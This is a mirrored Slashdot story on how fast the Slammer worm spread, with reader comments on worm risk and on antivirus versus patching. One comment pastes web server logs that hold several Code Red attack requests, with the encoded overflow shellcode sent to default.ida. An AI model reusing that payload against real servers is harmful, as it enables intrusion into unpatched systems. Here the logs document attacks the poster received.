Slashdot Mirror

← Back to Stories (view on slashdot.org)

Worms Going Further, Faster

Posted by timothy on from the thanks-for-your-attention dept.

Major Byte writes "Rob Kolstad's MOTD (pdf) column in Usenix login; passes along a few distilled factiods from a CAIDA analysis of the 'Sappire/Slammer' Worm. When it was at full blast it was scanning over 3 billion systems per hour--a speed that 'a "better" vulnerability would have enabled infection of the entire internet in 15 minutes, a "flash worm" or a "Warhol Worm."' I think 'better' to mean 'able to infect across a lot of platforms.'"

3 of 301 comments (clear)

  1. I'm still getting pestered by Code-Red. by Chyeburashka · · Score: 0, Troll

    216.31.149.142 - - [04/Jun/2003:17:15:29 -0600] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 392 "-" "-"
    216.31.149.142 - - [04/Jun/2003:17:17:06 -0600] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 392 "-" "-"
    172.182.46.212 - - [04/Jun/2003:17:46:09 -0600] "GET / HTTP/1.0" 200 7029 "-" "-"
    217.230.180.171 - - [04/Jun/2003:22:05:36 -0600] "OPTIONS * HTTP/1.0" 200 0 "-" "-"
    210.179.95.123 - - [07/Jun/2003:11:16:01 -0600] "GET /sumthin HTTP/1.0" 404 388 "-" "-"
    216.60.56.84 - - [07/Jun/2003:19:38:47 -0600] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 392 "-" "-"

  2. Re:No worms for me, please! by ryanvm · · Score: 0, Troll

    Antivirus software is for people who, from time to time, make a mistake. Like mis-clicking on an attachment at 3am, or misreading a file type and running an unsafe file.

    Well, I guess it's harder for you then it is for me. You look at the sender, you look at the subject and body, and you look at the attachment. Then, your freaking mail client asks you, "Are you sure you want to open this?" IF you know what to watch out for, those should be plenty of "last chances".

    Antivirus software is for people who run software that has bugs in it. You mentioned you are using Windows...

    Not really, a better solution is to keep your system patched. I contend that most holes are patched quicker than most exploit-type viruses are identified and put into the signature updates. The security holes that cause Code Red, Nimda, etc. always seem to have patches long before the epidemics, don't they?

    Antivirus software is for people who believe in Security In Depth, a school of thought which says that you should use multiple layers of security, so that if one fails you aren't screwed.

    Well, so is encrypting your filesystem, having a locking screensaver, unplugging your network cable when idle, etc. Obviously another layer is a good thing. But at what point do you decide that it's not worth the money or slowdown to take that extra step. And yes, scanning for 50,000 (and growing) data patterns every time you open a file WILL slow your system down.

    Antivirus software is for people whose data is worth more than $50 (or $20 after rebate).

    No it's not - it's for people who would rather spend $50 than understand the internals of their operating system. Not that there's anything wrong with that. I'd rather spend $150 to fix my furnace than learn how to do it myself.

    My point was not that most people don't need antivirus software. They do. I was just disagreeing with the original poster who claimed that knowledgable users understand the necessity of antivirus software. Not true. Knowledgable users don't engage in stupid behavior.

  3. Re:No worms for me, please! by ryanvm · · Score: 0, Troll

    I guess the difference of opinion that we have is that you believe it's extremely unlikely that you will someday make a mistake, whereas I believe it's nearly certain that all of us make mistakes every day.

    That about sums it up.